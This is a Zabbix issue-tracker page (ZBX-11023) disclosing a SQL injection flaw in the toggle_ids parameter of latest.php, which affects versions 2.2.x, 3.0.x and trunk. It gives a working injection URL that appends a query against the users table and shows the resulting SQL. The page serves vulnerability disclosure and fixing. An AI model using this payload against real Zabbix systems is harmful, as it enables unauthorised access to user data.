Uploaded image for project: 'ZABBIX BUGS AND ISSUES'
  1. ZABBIX BUGS AND ISSUES
  2. ZBX-11023

SQL injection vulnerabilities in "Latest data"

          Details

            Description

            Zabbix 2.2.x, 3.0.x and trunk suffers from a remote SQL injection vulnerability due to a failure to sanitize input in the toggle_ids array in the latest.php page.

            For example:
            latest.php?output=ajax&sid=&favobj=toggle&toggle_open_state=1&toggle_ids[]=15385); select * from users where (1=1

            Result

            SQL (0.000361): INSERT INTO profiles (profileid, userid, idx, value_int, type, idx2) VALUES (88, 1, 'web.latest.toggle', '1', 2, 15385); select * from users where (1=1)
latest.php:746 ? require_once() ? CProfile::flush() ? CProfile::insertDB() ? DBexecute() in /home/sasha/zabbix-svn/branches/2.2/frontends/php/include/profiles.inc.php:185

              Attachments

                Issue Links

                depends on

                Problem report - Problem report ZBX-12951 Microsoft Windows MHTML Cross Site Scripting Vulnerabilities

                • Major - Major loss of function.
                • Elaborating
                is duplicated by

                Incident report - Incident report ZBX-11138 Syntax error logged in systemlog by PostgreSQL

                • Minor - Minor loss of function, or other problem where easy workaround is present.
                • Closed

                  Activity

                    People

                    • Assignee:
                      Unassigned
                      Reporter:
                      sasha Alexander Vladishev
                    • Votes:
                      0 Vote for this issue
                      Watchers:
                      2 Start watching this issue

                      Dates

                      • Created:
                        Updated:
                        Resolved: